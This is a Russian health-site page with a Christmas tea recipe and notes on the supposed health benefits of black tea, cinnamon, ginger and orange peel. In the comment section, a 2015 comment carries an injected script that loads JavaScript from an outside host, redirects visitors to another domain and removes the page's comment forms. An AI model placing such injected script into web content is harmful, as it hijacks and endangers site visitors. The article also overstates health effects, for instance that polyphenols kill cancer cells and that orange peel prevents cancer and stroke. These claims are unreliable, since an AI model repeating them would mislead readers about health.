Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Готовим рождественский ча...  >>  Готовим рождественский чай
 
Обратная связь
 

Готовим рождественский чай

Размер шрифта
11 января 2012 07:40
  • google_analytics: false
  • Нравится

Аромат рождественского чая помогает проникнуться духом Рождества! А полезные свойства этого напитка – это все его ингредиенты. Завариваем традиционный рождественский чай.

1

Состав рождественского чая:

1. Черный чай, который содержит таругины, теафлавины, полифенолы и танины.

Теафлавины – это флавоноиды, которые снижают уровень плохого холестерина, и как следствие – вероятность развития атеросклероза, инфаркта и инсульта.

Полифенолы – убивают раковые клетки, защищают клетку от повреждения, тем самым тормозят развитие злокачественных новообразований. Кроме того, полифенолы расщепляют и выводят жир из организма человека, тем самым способствуя похудению.

Танины – вяжущие вещества, которые обладают противодиарейными и кровоостанавливающими свойствами. Они осаждают белки тканевых клеток, поэтому оказывают местное вяжущее или раздражающее действие на слизистые оболочки.

2. Корица – одна из самых известных специй.

  • Регулирует уровень сахара в крови, особенно полезна для диабетиков 2-го типа. Корица ускоряет метаболизм, организм сжигает всю глюкозу, не позволяя ей откладываться в жиры. 
  • Снижает уровень плохого холестерина.
  • Снижает аппетит.

3. Имбирь – cодержит эфирные масла – гингеролы, которые защищают наши клетки от свободных радикалов.

  • Имбирь подавляет противовоспалительные соединения, улучшает производство синовиоцитов (клетки синовиальной оболочки суставов) и лейкоцитов (клетки иммунной системы).
  • Гингерол, главный активный компонент имбиря, препятствует развитию рака толстого кишечника.

4. Апельсиновая цедра

  • Волокна в апельсиновой корке способствуют снижению давления и уровня холестерина, спасают от инсульта и сердечной аритмии.
  • Витамин C нейтрализует свободные радикалы, то есть защищает от рака.

Пьедестал почета по количеству теаругинов и теафлавонов:

1. Черный чай в 100 мл – 6 мг

2. Зеленый чай

3. Белый чай

Как выбрать

  • В готовых смесях могут содержаться консерванты и сахар. Выбирайте все ингредиенты отдельно.
  • Чай рассыпной листовой (не в пакетиках) обычно более высокого качества. Пакетированный чай может содержать пыль и мелкие чайные частички.
  • Рассыпной листовой чай свежий, если при нажатии на чайные листья исходит свежий аромат.
  • Чтобы проверить чайные пакетики на свежесть, нужно высыпать чай из пакетика и бросить пустой пакетик в чашку с кипятком. Если вода стала со вкусом чая – значит, что бумага пропиталась чаем и вобрала в себя весь вкус, а чай – на самом деле старый.

Корица

Если аромат сладкий – корица свежая.

Имбирь

Свежий имбирный корень должен быть гладким, плотным, не сморщенным и маловолокнистым. Прожилки и волокна говорят о старости корня. Чем длиннее корень, тем он богаче эфирными маслами и микроэлементами.

Как хранить

Сухой чай хранится в герметичной посуде с притертой крышкой, без доступа света и влаги, а также сильных запахов, так как чай хорошо их впитывает.

Свежий чай можно пить еще 1-2 дня холодным, тогда чай впитает в себя больше фруктового вкуса. Такой чай следует хранить в герметичной бутылке в холодильнике.

Корица

Хранить корицу нужно в плотном запечатанном стеклянном контейнере в прохладном, темном и сухом месте.

Корицу также можно хранить в холодильнике.

Имбирь

Высушенные неочищенные корни имбиря следует хранить в темном прохладном месте.

Как готовить

Рецепт рождественского чая:

1. Почистить половинку апельсина и высушить корочки в духовке в течение 10 минут (температура около 100°).
2. Высушенные корочки разломить на мелкие кусочки.
3. Заполнить емкость черным чаем и добавить в него высушенные апельсиновые корки, тертый имбирь, мелконарезанную половину палочки ванили, целую палочку корицы.
4. Подогреть чай, помешивая его, чтобы все ингредиенты перемешались.
5. Разлить горячий готовый чай по чашкам, добавить в них по дольке свежего апельсина.


Сюжеты по теме:
Рождественский чай. Волшебные ароматы Рождества

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.